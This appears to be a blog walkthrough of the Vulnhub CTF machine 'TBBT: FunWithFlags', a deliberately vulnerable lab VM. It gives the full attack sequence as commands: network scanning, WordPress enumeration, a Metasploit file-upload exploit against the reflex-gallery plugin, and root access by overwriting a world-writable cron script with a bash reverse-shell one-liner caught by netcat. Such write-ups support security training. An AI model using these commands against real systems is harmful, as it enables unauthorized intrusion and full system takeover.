TBBT: FunWithFlags Walkthrough vulnhub

TBBT: FunWithFlags Walkthrough Vulnhub CTF

Today, we’re sharing another Vulnhub CTF Walkthrough TBBT: FunWithFlags design by emaragkos This VM machine hosted on Vulnhub.com you can download here the machine link

Network Scanning

Our First Step is Finding the target IP Address using netdiscover

netdiscover

After finding the target IP address I perform Nmap Aggressive scanning (-p- parameter ) all port scanning

nmap -A 192.168.1.105 -p-

dirb is a web content scanner that was also used to brute force for any available files and directory on the website.

dirb http://192.168.1.105

Enumeration

we see dirb result many URL I open the URL http://192.168.1.105/music/wordpress/ our browser and we see a WordPress website

dirb http://192.168.1.105/music/wordpress/

without wasting our time I move on wpscan WordPress scanner ( -e ap parameter enumerate all plugin installed )

wpscan --url http://192.168.1.105/music/wordpress/ -e ap

I found an outdated plugin reflex-gallery version: 3.1.3 I search the exploit-db exploit and I found an exploit arbitrary file upload.

msfconsole

use unix/webapp/wp_reflexgallery_file_upload

set targeturi /music/wordpress/
set rhosts 191.168.1.105
run

shell

After ran shell command we see a black restrict shell now I importing the python3 spawn shell

python3 -c 'import pty;pty.spawn("/bin/bash")'

cd /home
ls

In Amy’s home directory, I found two file notes.txt and secretdiary

cd amy
ls -lsa

I reading the notest.txt using cat command and we see a hint massage this is my secret diary

cat notes.txt

I ran strings and our file secretdiary command according to user hint I found an 18 digit password

strings secretdiary

‌It’s an enumeration time! I move the home directory I found my second flag in penny’s home directory

cd penny

cat .FLAG.penny.txt

Privilege Escalation

cd leonard
ls -lsa

Leonard’s directory contained a bash script with some comments in it and we see the file permission all user edit this file and the file owner is the root

cat themostat_set_temp.sh

We see crontab configuration thermostat_set_temp.sh file is run automatically every one minute I create a simple bash reverse shell and echo command to overwrite the thermostat_set_temp.sh

cat /etc/crontab

echo "bash -i >& /dev/tcp/192.168.1.4/4545 0>&1" > thermostat_set_temp.sh

Before starting the bash script we need to start our netcat listener

./thermostat_set_temp.sh

nc -lvp 4545

After Wait a minute I got a reverse shell root user I move on the root directory and reading our final last flag contains the root directory

id
cd /root
ls

cat FLAG-leonard.txt

Inclusiveness 1 Walkthrough Vulnhub read